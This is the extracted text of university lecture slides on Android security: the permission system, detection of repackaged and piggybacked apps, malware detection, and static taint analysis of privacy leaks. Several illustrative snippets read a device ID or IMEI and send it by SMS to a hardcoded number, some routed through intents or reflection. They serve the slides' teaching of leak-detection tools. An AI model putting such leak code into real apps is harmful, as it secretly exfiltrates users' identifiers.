FIT5003 Software Security
Mobile Security II
1
Android Permission System
activity
restricts access to the activity
checked when starting activity
throw SecurityException if caller does not have required permission
service
restricts who can start, stop or bind to the service
receiver
restricts who can send broadcasts to the BroadcastReceiver checked at delivery, after broadcast was sent
does not throw exception in case of permission failure
provider
restrict who can access the data
read and write permissions
checked when performing operations(e.g. query, insert)
2
Android Permission System
Android Framework Security
Mandatory Access Control(MAC) enforced by middleware
Components protected using access permission labels declared in the AndroidManifest file
can not be changed after installation
4 protection levels
normal – always granted
dangerous – requires user approval
signature – matching certificate
signature or system – matching certificate with system
image
3
Android Permission System
At install-time each application requests a list of permissions
All permissions must be granted at install time – all or nothing
Protect access to Android components, services and APIs, e.g API for access to phone’s hardware
∼130 API-defined permissions in Manifest.Permissions class
Custom-defined permissions by developers
name conflicts may appear
current research on Android permissions doesn’t take them into
consideration
4
Examples of Permissions
– INTERNET (string: “android.permission.INTERNET”)
5
Examples of Permissions
– INTERNET (string: “android.permission.INTERNET”)
– ACCESS_NETWORK_STATE, ACCESS_WIFI_STATE, CHANGE_NETWORK_STATE, READ_PHONE_STATE
– ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION
– READ_SMS, RECEIVE_SMS, SEND_SMS
– ANSWER_PHONE_CALLS, CALL_PHONE, READ_CALL_LOG, WRITE_CALL_LOG
– READ_CONTACTS, WRITE_CONTACTS
– READ_CALENDAR, WRITE_CALENDAR
– READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE
– RECORD_AUDIO, CAMERA
– BLUETOOTH, NFC
– RECEIVE_BOOT_COMPLETED
– SYSTEM_ALERT_WINDOW
– SET_WALLPAPER
6
{READ,WRITE}_EXTERNAL_STORAGE
– Each app has access to a private directory – No other apps can access this directory *
– The device offers an “external storage” – In the past: physical “removable” SD Card
– Currently: part of the file system that apps can use to share files – “/sdcard”
7
RECEIVE_BOOT_COMPLETED
– When the system boots, it broadcasts an Intent with the “ACTION_BOOT_COMPLETED” action
– An app can declare an intent filter for this intent so that it can automatically start at boot!
– Useful to gain persistence / survive reboots
– And that’s why the Android folks added a permission requirement
– Note: the app needs to be manually started to receive it
8
SYSTEM_ALERT_WINDOW
– Draw arbitrary windows/overlays on top of other apps – Can be completely custom: position, shape, content, transparency – Can be clickable ⊕ passthrough
– It leads to many UI attacks
– UI confusion, clickjacking, phishing – Teaser: Cloak & Dagger
9
Permission Granting
– Normal permissions
– no explicit granting necessary
– Dangerous permissions – The user needs to be asked
– Signature permissions
– It depends
– Granted at install time when app is signed by same certificate of defining app – Otherwise, the user is asked
– Not all of these are available to third-party apps
10
Permission Request
…
11
Custom Permissions (doc)
– Apps can define “custom” permissions!
– The “system” permissions are defined in the same way – AndroidManifest.xml
12
Components Permission Enforcement
– Apps’ components can specify which permissions are required to use them
13
Android Permission System
Are users paying attention to the permissions? Do users understand the permissions?
Can users make correct security decisions?
Stowaway Bartel et al. PScout
[1] Felt, Adrienne Porter, Erika Chin, Steve Hanna, Dawn Song, and David Wagner. “Android permissions demystified.” In Proceedings of the 18th ACM conference on Computer and communications security (CCS 2011), pp. 627-638. ACM, 2011.
[2] Kathy Wain Yee Au, Yi Fan Zhou, Zhen Huang and David Lie. PScout: Analyzing the Android Permission Specification . In the Proceedings of the 19th ACM Conference on Computer and Communications Security (CCS 2012). 2012
Analyzing Android , in IEEE Transactions of Software Engineering (TSE), 2014
[3] Alexandre Bartel, Jacques Klein, Martin Monperrus, Yves Le Traon: Static Analysis for Extracting Permission Checks of a Large Scale Framework: The Challenges And Solutions for
14
Android Permission System
15
Android Permission System
16
Identifying Mobile Security Issues
17
Mobile Security
Static Analysis Dynamic
Analysis
Tan, Darell JJ, Tong-Wei Chua, and Vrizlynn LL Thing. “Securing android: a survey, taxonomy, and challenges.” ACM Computing Surveys (CSUR) 47, no. 4 (2015): 58.
18
Mobile Security
STRIDE
A Taxonomy and Qualitative Comparison of Program Analysis Techniques for Security Assessment of Android Software
Alireza Sadeghi, Hamid Bagheri, Joshua Garcia, and Sam Malek
IEEE Transactions on Software Engineering (TSE), Vol. 43, Issue 6, June 2017
19
Mobile Security
20
Mobile Security
Clone Detection Malware Analysis Privacy Leak
21
Clone Detection
Original App
Carrier
Hook
Malicious Piggybacked Payload App
Rider
Wu Zhou, Yajin Zhou, Michael Grace, Xuxian Jiang, and Shihong Zou. Fast, scalable detection of “piggybacked” mobile applications. In CODASPY ’13, pages 185–196, New York, NY, USA, 2013
22
Clone Detection
Cloning is the process of building a software by re- verse engineering another software or by re-implementing it based on documentation or usage experience.
Repackaging refers to the core process of unpacking a soft- ware package, then repackaging it after a probable modification of the decompiled code and/or of other resource files (e.g. logos, Permission list, etc.).
Piggybacking is defined in the literature as a malware development activity where a given benign app is repackaged to include a malicious payload. Piggybacked apps thus constitute a subset of repackaged apps.
23
Clone Detection
Similarity Comparison
Symptom Discovery
(Un)Supervised Learning Runtime Monitoring
24
Clone Detection
Similarity Computation Algorithms
25
Clone Detection
Plugin-based Framework
Li, Li, Tegawendé F. Bissyandé and Jacques Klein. “SimiDroid: Identifying and Explaining Similarities in Android Apps.” 2017 IEEE Trustcom/BigDataSE/ICESS (2017): 136-143.
26
https://github.com/lilicoding/SimiDroid
Clone Detection
Method Component Resource
27
Clone Detection
identical: both key and value are exactly the same similar: same key but different value
new: key is new
deleted: key is deleted
28
Clone Detection
Symptom Discovery
Symptom Discovery builds on the intuitive assumption that repackaging processes leave marks on the repackaged apps. If such marks can be fully characterized, it is possible to spot the symptoms in apps.
AndroidSOO has recently introduced and explored a novel and easily extractable attribute called String Offset Order, which is extracted from string identifiers list in the classes.dex bytecode file.
29
Clone Detection
(Un)Supervised Learning
30
Clone Detection
Watermarking Birthmarking
Runtime Monitoring
31
Clone Detection
Detecting Clone Apps Understanding Cloning in Android
32
Clone Detection
(1) Constant String Replacement.
class Start extends Activity { void callAdds() {
$r1 = $r0.
-virtualinvoke $r1.setAdUnitId(“a1522d5c390a573″);
+ virtualinvoke $r1.setAdUnitId(String)(” ca-app-pub-8182614411920503/1232098473”);
}}
33
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
class UnityPlayerProxyActivity extends Activity { protected void onCreate(Bundle) {
specialinvoke $r0.onCreate($r1);
+ staticinvoke
}}$r2 = newarray (java.lang.String)[2];
34
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
35
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
36
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
(4) Duplicated Component Capabilities.
receiver: “com.kuguo.ad.MainReceiver” intent-filter
action: “android.net.conn.CONNECTIVITY_CHANGE”
receiver: “net.crazymedia.iad.AdPushReceiver” intent-filter
action: “android.net.conn.CONNECTIVITY_CHANGE”
37
Malware Analysis
38
Malware Analysis
39
Malware Analysis
40
Malware Analysis
41
Malware Analysis
Machine Learning-based Malware Detection
42
Malware Analysis
Example: CHABADA
43
Malware Analysis
Example: CHABADA
44
Malware Analysis
Example: CHABADA
45
Privacy Leak
46
Privacy Leak
Taint Analysis
source
sink
47
Privacy Leak
public class Activity_A { void onCreate(Bundle b) {
String id = telManager.getDeviceId(); //…
String alias = id;
String number = “+3524666445556”;
}}sms.sendTextMessage(number, null, alias, null, null);
source
sink
48
Privacy Leak
FlowDroid: Precise Context, Flow, Field, Object-sensitive and Lifecycle-aware Taint Analysis for Android Apps
Multiple Entrypoints Callback methods
49
Privacy Leak
Multiple Entrypoints
Main Launcher
50
Privacy Leak
Callback methods
51
Privacy Leak
Callback methods
52
Privacy Leak
Dummy main methods
53
Privacy Leak
54
Privacy Leak
55
Privacy Leak
Static Taint Analysis
Build Sound Call Graph
56
Privacy Leak
APP
Activity_A
ICC Method
startActivity()
Android Framework
Activity_B
57
Privacy Leak
Activity_A Activity_B
58
Activity_A
String id = telManager.getDeviceId();
Intent intent = new Intent(this, Activity_B.class); intent.putExtra(“sensitive”, id); startActivity(intent)
Activity_B
Broken Call Graph (CFG)
void onCreate(Bundle b) {
Intent intent = getIntent();
String id = intent.getStringExtra(“sensitive”); String number = “+3524666445556”; sms.sendTextMessage(number, null, id, null, null);
}
source
sink
59
Privacy Leak
IccTA
ICC Links Building
Call Graph Bridging
Resolving Intent Values
Activity_A {
Intent: {
} targetcomp:Activity_B
60
Constant String Propagation
Privacy Leak
IccTA
ICC Links Building
Activity_A
– startActivity(intent);
Call Graph Bridging
ICC link
Activity_B
void dummyMain() {
Intent i = getIntent() //Lifecycle/Callback methods }
+ Activity_B a2 = new Activity_B(intent);
+ a2.dummyMain();
61
Privacy Leak
Activity_A ICC link
– startActivity(intent);
+ a2.dummyMain();
Activity_B
void dummyMain() {
Intent i = getIntent() //Lifecycle/Callback methods }
+ Activity_B a2 = new Activity_B(intent);
private Intent intent = null;
public Activity_B(Intent intent) {
this.intent = i;}
@override
public Intent getIntent() {
return this.intent;}
62
Privacy Leak
Inter-Component Call Graph
63
Privacy Leak
APP
Activity_A
Reflective Method
Reflective Method
ICC Method
startActivity()
Activity_B
64
Privacy Leak
String imei = telephonyManager.getDeviceId();
Class c = Class.forName(“de.ecspride.ReflectiveClass”); Object o = c.newInstance();
Method m = c.getMethod(“setIme” + “i”, String.class); m.invoke(o, imei);
Method m2 = c.getMethod(“getImei”);
String s = (String) m2.invoke(o);
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage(“+49 1234”, null, s, null, null);
source
sink
65
Privacy Leak
DroidRA
1) Toinfertargetvaluesofreflectivecalls.
m.invoke(o, imei); //o.setImei(imei);
2) ToreplacereflectivecallswithtraditionalJavacalls
66